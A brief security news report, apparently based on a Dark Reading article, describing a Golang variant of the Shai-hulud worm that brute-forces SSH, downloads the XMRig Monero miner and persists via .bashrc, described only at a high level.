A new variant of the Shai-hulud worm has been identified by security researchers at Check Point. This resurfaced malware, named after a creature from the ‘Dune’ science fiction series, is designed to install cryptocurrency mining software on compromised systems.

Technical Evolution: From Perl to Golang

Unlike its Perl-based predecessor, this version of Shai-hulud is written in the Go programming language (Golang). The use of Golang provides the worm with cross-platform capabilities, although the observed attacks specifically target Linux systems. Researchers identified the name ‘Shai-hulud’ within the malware’s code, which was compiled without symbols to make reverse-engineering and analysis more difficult.

Attack Vector and Payload Delivery

The worm’s primary method of propagation is through brute-force attacks against SSH services. It utilizes a hardcoded list of common usernames and passwords to gain unauthorized access to Linux servers. Once a system is breached, the worm connects to a command-and-control (C2) server to download and execute a malicious script. This script is responsible for deploying the final payload: the XMRig cryptocurrency miner, which is used to mine Monero. To ensure its continued presence on the infected machine, the malware establishes persistence by modifying the .bashrc file, causing it to execute each time a user logs in.

Source: https://www.darkreading.com/application-security/infamous-shai-hulud-worm-resurfaces-from-depths